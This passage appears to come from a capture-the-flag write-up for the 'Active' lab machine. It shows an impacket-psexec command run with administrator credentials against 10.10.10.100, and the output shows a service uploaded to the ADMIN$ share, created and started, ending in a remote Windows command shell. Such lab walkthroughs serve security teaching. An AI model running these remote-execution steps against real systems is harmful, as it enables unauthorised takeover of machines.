Now we have writable shares and credentials so, we can use psexec to get the shell as well.
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec active.htb/[email protected]Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service REEo on 10.10.10.100.....
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
